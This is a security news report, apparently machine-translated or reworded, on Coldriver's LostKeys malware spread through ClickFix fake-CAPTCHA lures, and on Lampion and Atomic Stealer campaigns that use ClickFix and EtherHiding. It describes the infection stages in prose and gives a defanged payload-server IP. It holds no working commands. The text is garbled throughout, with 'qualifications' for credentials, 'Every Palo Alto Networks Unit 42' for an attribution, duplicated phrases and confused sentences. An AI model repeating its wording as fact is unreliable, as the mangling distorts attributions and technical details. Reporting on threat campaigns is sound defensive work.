A Russian-related threat actor known as Coldriver It has been observed to distribute new malware called LostKeys As part of a spy-focused campaign using social engineering lures like Clickfix.
“LostKeys can steal files from hardcoded lists of extensions and directories, and can send system information and running processes to attackers.”
The malware was observed in January, March and April 2025 in attacks on Western governments, the military, and current and former advisors against journalists, think tanks and NGOs, according to the company. Additionally, individuals connected to Ukraine are also chosen.
LostKeys is the second custom malware that stems from the Coldriver after Spica, marking a continuous deviation from the phishing campaigns of the qualifications that threat actors are known to. Hacking groups are also tracked by the names Callisto, Star Blizzard, and UNC4057.
“They are known to steal qualifications, and after accessing the target account, they remove emails and steal contact lists from the compromised account,” said security researcher Wesley Shields. “If you choose, Coldriver may attempt to distribute malware to the target device and access files on the system.”
The latest series of attacks starts with a decoy website that contains a fake Captcha verification prompt. Victims are instructed to paste a Powershell command copied into Clipboard, a widely popular social engineering technique called Clickfix, into Clickfix, open the Windows Run dialog and paste the PowerShell command.
The PowerShell command is designed to download and run the following payload from a remote server (“165.227.148(.)68”). This acts as a three-stage downloader before carrying out any possible efforts to avoid running on virtual machines.
The third stage payload, a base64 encoded blob, is decoded into a PowerShell script responsible for running the lost keys of compromised hosts, allowing threat actors to collect files from hardcoded lists of extensions and directories, run the process and collect files.
Malware is rated as being deployed selectively, as in the case of SPICA. It demonstrates the highly targeted nature of these attacks.
Google also said it had discovered additional Lostkeys artifacts dating back to December 2023, spoofing a binary related to the Maltego open source research platform. It is unclear whether these samples have something to do with Coldriver or whether the malware has been reused by threat actors since January 2025.
Clickfix adoption continues to grow
This development is because Clickfix continues to be steadily adopted by multiple threat actors, distributing a wide range of malware families, including bank Trojans called Lampion and Atomic Stealer.
Every Palo Alto Networks Unit 42, attack Lampion propagation and use a phishing email with ZIP file attachments as lures. HTML files residing in the ZIP archive will use ClickFix instructions to launch the Multi stage infection process to redirect message recipients to a fake landing page.
“Another interesting aspect of Lampion’s infection chain is that it is divided into several non-continuous stages that are carried out as separate processes,” Unit 42 said. “This distributed execution complicates detection because the attack flow does not form a process tree that is easily identifiable. Instead, it consists of a complex chain of individual events, some of which may appear benign on their own.”
Malicious campaigns target Portuguese-speaking individuals and organizations in a variety of areas, including government, finance and transportation.
Over the last few months, the Clickfix strategy has been combined with another sleazy tactic called EtherHiding, which uses Binance’s Smart Chain (BSC) contract to hide the payload of the next stage, eventually leading to the delivery of a MacOS information steeler called Atomic Stealer.
Clicking “I’m Not a Robot” will trigger a Binance Smart Contract using ether hiding techniques to deliver base64-encoded commands to the clipboard. This prompts the user to run in the terminal via a Macos-specific shortcut (⌘+Space, ⌘+V). “This command downloads a script that retrieves and executes a signed MACH-O binaries confirmed as an atomic stealer.”
Further investigations have shown that the campaign likely compromised around 2,800 legitimate websites to serve fake capture prompts. The large-scale watering hole attack has been called MacReaper by researchers.
“This attack will maximize infection by leveraging unforeseen JavaScript, three full-screen IFRAMEs and a blockchain-based command infrastructure,” the researchers added.
